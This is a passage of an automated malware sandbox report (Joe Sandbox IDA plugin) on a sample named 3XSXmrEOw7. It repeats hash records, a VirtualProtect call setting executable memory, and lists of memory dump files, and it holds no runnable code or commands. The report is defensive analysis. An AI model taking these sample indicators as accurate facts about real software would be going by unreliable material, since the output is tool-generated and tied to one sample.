                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                        • Instruction ID: 27de90576a5a983c8bb595c6caf4dd849db3fb230b9d96bcbd17ce429aaee787
                                                                                                                        • Opcode Fuzzy Hash: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                        • Instruction Fuzzy Hash: 54C125A2D082649AF7208624DC447EB7A69EF51310F1440FED98D672C1DABE1FC58BA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                        • Instruction ID: 739206e10e5bbd3a87ea5bf69ee451f3fa2a1961f9d0f60c166b0e27f9f25d40
                                                                                                                        • Opcode Fuzzy Hash: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                        • Instruction Fuzzy Hash: 72C136A2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                        • Instruction ID: 3f89346d8a0091a78b3bd381845a04ed6bfbe6e677ca770093b5f7ced1ed0a00
                                                                                                                        • Opcode Fuzzy Hash: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                        • Instruction Fuzzy Hash: 35C135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
                                                                                                                        • Instruction ID: 2eaf220d0d019d4476795fcdad0f36ee08c7a98f075cd34990ffe1a67c0fd865
                                                                                                                        • Opcode Fuzzy Hash: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
                                                                                                                        • Instruction Fuzzy Hash: AAC127A2C082649AF7208624DC447EB7A68DF51314F1440FED94DA72C1DABE1FC6CBA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                        • Instruction ID: eee95b753abb5236ba68af6bac4d2848ac6c00735159e87780bc59e9a7c006ba
                                                                                                                        • Opcode Fuzzy Hash: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                        • Instruction Fuzzy Hash: D9C134A2D042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                        • Instruction ID: b87fff604113521d0e075d409872acac2f19840f2612352ddb19065799ca5343
                                                                                                                        • Opcode Fuzzy Hash: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                        • Instruction Fuzzy Hash: 9EC137A2C082649AF7208624DC447EB7A69DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                        • Instruction ID: c319c942094677a70afdbac739dc446af6ba709f5ac1e1e70e693c49bdc09623
                                                                                                                        • Opcode Fuzzy Hash: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                        • Instruction Fuzzy Hash: CEC124A2D082649AF7208624DC447EB7A69DF51310F1440FED98D672C1DABE0FC6CBA7
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                        • Instruction ID: 9e595a24c9be7f7410a59fb938de830ddc10ba8880a9535f11e1221573845212
                                                                                                                        • Opcode Fuzzy Hash: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                        • Instruction Fuzzy Hash: E5C136A2C082649AF7208624DC447EB7A68DF51310F1440FED98DA72C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4467e9f4c2d4e4537828d09e37f5eaea477485ba2b457bd53e0c0fd48335732b
                                                                                                                        • Instruction ID: e61220c44efc44d8f35c04059808cad78e1aea9d5a9cba44ff91179e6e520261
                                                                                                                        • Opcode Fuzzy Hash: 4467e9f4c2d4e4537828d09e37f5eaea477485ba2b457bd53e0c0fd48335732b
                                                                                                                        • Instruction Fuzzy Hash: 2DC134A2D082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC5CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
